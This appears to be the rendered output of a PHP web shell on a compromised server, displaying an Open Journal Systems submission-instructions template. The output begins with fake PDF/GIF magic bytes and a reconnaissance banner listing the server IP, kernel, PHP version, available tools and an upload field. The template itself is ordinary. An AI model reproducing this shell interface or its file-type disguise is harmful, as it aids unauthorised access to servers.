%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/templates/submission/ |
Upload File : |
{**
* templates/submission/instructions.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Submissions instructions page.
*
*}
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="{$currentLocale|replace:"_":"-"}" xml:lang="{$currentLocale|replace:"_":"-"}">
<head>
<title>{translate key=$pageTitle}</title>
<meta http-equiv="Content-Type" content="text/html; charset={$defaultCharset|escape}" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<link rel="stylesheet" href="{$baseUrl}/lib/pkp/styles/common.css" type="text/css" />
<link rel="stylesheet" href="{$baseUrl}/styles/common.css" type="text/css" />
<link rel="stylesheet" href="{$baseUrl}/styles/compiled.css" type="text/css" />
<link rel="stylesheet" href="{$baseUrl}/styles/help.css" type="text/css" />
{foreach from=$stylesheets item=cssUrl}
<link rel="stylesheet" href="{$cssUrl}" type="text/css" />
{/foreach}
<!-- Compiled scripts -->
{if $useMinifiedJavaScript}
<script type="text/javascript" src="{$baseUrl}/js/pkp.min.js"></script>
{else}
{include file="common/minifiedScripts.tpl"}
{/if}
{$additionalHeadData}
</head>
<body>
{literal}
<script type="text/javascript">
<!--
if (self.blur) { self.focus(); }
// -->
</script>
{/literal}
<div id="container">
<div id="body">
<div id="main" style="width: 650px;">
<br />
<div class="thickSeparator"></div>
<h2>{translate key=$pageTitle}</h2>
<div id="content">
<p>{$instructions|nl2br}</p>
<p><input type="button" onclick="window.close()" value="{translate key="common.close"}" class="button defaultButton" /></p>
</div>
</div>
</div>
</div>
</body>
</html>